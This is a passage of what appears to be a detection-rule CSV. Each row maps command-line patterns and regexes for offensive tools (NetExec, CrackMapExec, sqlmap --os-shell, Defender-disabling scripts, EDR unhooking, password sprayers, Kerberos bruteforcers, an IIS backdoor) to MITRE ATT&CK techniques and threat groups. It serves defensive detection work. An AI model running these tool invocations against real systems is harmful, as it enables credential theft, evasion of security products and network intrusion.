TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* -u * -p * -M nanodump*",".{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-M\snanodump.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* -u * -p * -M ntdsutil*",".{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-M\sntdsutil.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* -u * -p * --sam",".{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-\-sam","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* -u * -p * --shares*",".{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-\-shares.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* -u * -p *--pass-pol*",".{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\-\-pass\-pol.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* -u *http* --dbs",".{0,1000}\s\-u\s.{0,1000}http.{0,1000}\s\-\-dbs","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "* -u *http* --os-shell*",".{0,1000}\s\-u\s.{0,1000}http.{0,1000}\s\-\-os\-shell.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "* -u FUZZ *",".{0,1000}\s\-u\sFUZZ\s.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "* -u http* -f *.dll * -p *",".{0,1000}\s\-u\shttp.{0,1000}\s\-f\s.{0,1000}\.dll\s.{0,1000}\s\-p\s.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","3229","590","2024-03-31T02:30:39Z","2019-03-27T23:24:44Z" "* -u http* --wordlisturl * -e php,aspx --recursion true*",".{0,1000}\s\-u\shttp.{0,1000}\s\-\-wordlisturl\s.{0,1000}\s\-e\sphp,aspx\s\-\-recursion\strue.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","0","N/A","7","1","60","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z" "* -u jasminadmin -p* jasmin_db *",".{0,1000}\s\-u\sjasminadmin\s\-p.{0,1000}\sjasmin_db\s.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "* -U msf -P msf *",".{0,1000}\s\-U\smsf\s\-P\smsf\s.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","0","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "* -u wordlist * wordlist_uniq_sorted*",".{0,1000}\s\-u\swordlist\s.{0,1000}\swordlist_uniq_sorted.{0,1000}","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","0","N/A","N/A","3","227","46","2024-05-01T14:27:57Z","2020-10-21T14:37:53Z" "* -U:T -ShowWindowMode:Hide reg add *",".{0,1000}\s\-U\:T\s\-ShowWindowMode\:Hide\sreg\sadd\s.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "* -UacMe Elevate -Execute *",".{0,1000}\s\-UacMe\sElevate\s\-Execute\s.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "* UAC-TokenMagic.ps1*",".{0,1000}\sUAC\-TokenMagic\.ps1.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","0","N/A","10","3","254","46","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z" "* uberfile.py *",".{0,1000}\suberfile\.py\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* ubiquiti-discovery.nse*",".{0,1000}\subiquiti\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* UefiShell.iso*",".{0,1000}\sUefiShell\.iso.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","0","N/A","10","10","1626","323","2024-01-21T06:45:07Z","2019-03-25T19:47:39Z" "* --unconstrained-users*",".{0,1000}\s\-\-unconstrained\-users.{0,1000}","offensive_tool_keyword","windapsearch","Python script to enumerate users - groups and computers from a Windows domain through LDAP queries","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/ropnop/windapsearch","1","0","AD Enumeration","7","8","726","142","2022-04-20T07:40:42Z","2016-08-10T21:43:30Z" "* unDefender.exe*",".{0,1000}\sunDefender\.exe.{0,1000}","offensive_tool_keyword","unDefender","Killing your preferred antimalware by abusing native symbolic links and NT paths.","T1562.001 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/APTortellini/unDefender","1","0","N/A","10","4","321","77","2022-01-29T12:35:31Z","2021-08-21T14:45:39Z" "* -unhook -antidebug *",".{0,1000}\s\-unhook\s\-antidebug\s.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "* -unhook -antidebug * -self -sleep*",".{0,1000}\s\-unhook\s\-antidebug\s.{0,1000}\s\-self\s\-sleep.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "* -unhook -syscalls -obfuscate *",".{0,1000}\s\-unhook\s\-syscalls\s\-obfuscate\s.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "* --unhook-method * --dont-unload-driver * --dump-output *",".{0,1000}\s\-\-unhook\-method\s.{0,1000}\s\-\-dont\-unload\-driver\s.{0,1000}\s\-\-dump\-output\s.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","3","230","42","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" "* unicorn.py*",".{0,1000}\sunicorn\.py.{0,1000}","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/trustedsec/unicorn","1","0","N/A","N/A","10","3633","813","2024-01-24T20:02:33Z","2013-06-19T08:38:06Z" "* --union-char *GsFRts2*",".{0,1000}\s\-\-union\-char\s.{0,1000}GsFRts2.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "* unittest.nse*",".{0,1000}\sunittest\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* unusual-port.nse*",".{0,1000}\sunusual\-port\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* upnp-info.nse*",".{0,1000}\supnp\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* uptime-agent-info.nse*",".{0,1000}\suptime\-agent\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* -UrbanBishop -Command *",".{0,1000}\s\-UrbanBishop\s\-Command\s.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "* --url * --attacker *",".{0,1000}\s\-\-url\s.{0,1000}\s\-\-attacker\s.{0,1000}","offensive_tool_keyword","POC","VMWare vRealize Network Insight Pre-Authenticated RCE (CVE-2023-20887)","T1068 - T1190.001 - T1210.002 - T1059.001 - T1059.003 - T1190 - T1569.002","TA0005 - TA0002 - TA0001 - TA0040 - TA0043","N/A","N/A","Exploitation tools","https://github.com/sinsinology/CVE-2023-20887","1","0","N/A","N/A","3","226","44","2023-06-13T14:39:17Z","2023-06-13T13:17:23Z" "* --url --password SIMPLEPASS*",".{0,1000}\s\-\-url\s\-\-password\sSIMPLEPASS.{0,1000}","offensive_tool_keyword","IIS-Raid","A native backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","0","N/A","10","10","525","123","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z" "* -urlcache */debase64/*",".{0,1000}\s\-urlcache\s.{0,1000}\/debase64\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "* url-snarf.nse*",".{0,1000}\surl\-snarf\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* Use-DarkHotel*",".{0,1000}\sUse\-DarkHotel.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "* -user * --passwordlist *",".{0,1000}\s\-user\s.{0,1000}\s\-\-passwordlist\s.{0,1000}","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/xFreed0m/ADFSpray","1","0","N/A","N/A","1","83","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z" "* --user 'nemesis:*",".{0,1000}\s\-\-user\s\'nemesis\:.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "* user_persistence_run.c*",".{0,1000}\suser_persistence_run\.c.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tools","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","10","6","524","52","2024-04-05T14:21:15Z","2023-04-05T09:39:33Z" "* --user-as-pass*",".{0,1000}\s\-\-user\-as\-pass.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","10","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "* userenum * --dc *",".{0,1000}\suserenum\s.{0,1000}\s\-\-dc\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* userenum -d * *.txt*",".{0,1000}\suserenum\s\-d\s.{0,1000}\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","10","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "* --UserEnum --Host *",".{0,1000}\s\-\-UserEnum\s\-\-Host\s.{0,1000}","offensive_tool_keyword","ADCollector","ADCollector is a lightweight tool that enumerates the Active Directory environment","T1087 - T1018 - T1069 - T1482","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/dev-2null/ADCollector","1","0","N/A","7","7","619","83","2022-07-30T05:27:15Z","2019-05-15T06:42:20Z" "* -UserList * -Domain * -PasswordList * -OutFile *",".{0,1000}\s\-UserList\s.{0,1000}\s\-Domain\s.{0,1000}\s\-PasswordList\s.{0,1000}\s\-OutFile\s.{0,1000}","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain.","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","0","N/A","10","10","1636","362","2023-09-22T22:13:14Z","2016-10-04T23:37:37Z" "* -Username * -Hash * -Command *",".{0,1000}\s\-Username\s.{0,1000}\s\-Hash\s.{0,1000}\s\-Command\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-SMBExec.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* -Username * -Password * -Command * -LogonType *",".{0,1000}\s\-Username\s.{0,1000}\s\-Password\s.{0,1000}\s\-Command\s.{0,1000}\s\-LogonType\s.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","N/A","N/A","9","872","117","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" "* --UserName * --Password * --Payload *.exe*",".{0,1000}\s\-\-UserName\s.{0,1000}\s\-\-Password\s.{0,1000}\s\-\-Payload\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0003 - TA0002 - TA0011","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cnotin/SplunkWhisperer2","1","0","N/A","9","3","240","52","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z" "* -Username * -Password * -Recon -IncludeADFS*",".{0,1000}\s\-Username\s.{0,1000}\s\-Password\s.{0,1000}\s\-Recon\s\-IncludeADFS.{0,1000}","offensive_tool_keyword","MFASweep","A tool for checking if MFA is enabled on multiple Microsoft Services","T1595 - T1595.002 - T1078.003","TA0006 - TA0009","N/A","N/A","Exploitation tools","https://github.com/dafthack/MFASweep","1","0","N/A","9","10","1192","164","2024-01-31T22:52:58Z","2020-09-22T16:25:03Z" "* -userpassfile ./userpass_file.txt*",".{0,1000}\s\-userpassfile\s\.\/userpass_file\.txt.{0,1000}","offensive_tool_keyword","RagingRotator","A tool for carrying out brute force attacks against Office 365 with built in IP rotation use AWS gateways.","T1110 - T1027 - T1071 - T1090","TA0006 - TA0005 - TA0001","N/A","N/A","Credential Access","https://github.com/nickzer0/RagingRotator","1","0","N/A","10","1","74","5","2024-02-05T21:46:54Z","2023-09-01T15:19:38Z" 